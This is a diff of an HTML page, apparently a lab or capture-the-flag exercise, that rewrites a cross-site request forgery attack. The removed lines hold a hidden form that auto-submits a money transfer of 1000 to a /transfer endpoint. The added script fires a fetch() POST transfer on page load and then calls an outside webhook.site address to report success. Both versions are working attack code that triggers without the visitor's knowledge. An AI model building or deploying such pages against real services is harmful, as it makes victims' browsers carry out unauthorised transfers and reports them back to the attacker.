--- a/index.html
+++ b/index.html
@@ -4,12 +4,25 @@
     <title>Mitchell Zhou</title>
 </head>
 <body>
-    <form id="csrfForm" action="https://192.168.2.199:52011/transfer" method="POST">
-        <input type="hidden" name="user_to" value="s">
-        <input type="hidden" name="amount" value="1000">
-    </form>
     <script>
-        document.getElementById("csrfForm").submit();
+        // Trigger the POST request when the page loads
+        fetch("https://192.168.2.199:52011/transfer", {
+            method: "POST",
+            headers: {
+                "Content-Type": "application/x-www-form-urlencoded"
+            },
+            body: "user_to=s&amount=1"
+        })
+        .then(response => response.text())
+        .then(data => {
+            console.log(data); // Log the response
+            // If the transfer is successful, ping the webhook
+            return fetch("https://webhook.site/a6d320d6-cbaa-4b5c-b216-dfcf9036b541", {
+                method: "GET" // Ping the webhook
+            });
+        })
+        .then(() => console.log("Webhook pinged successfully"))
+        .catch(error => console.error("Error:", error));
     </script>
 </body>
 </html>
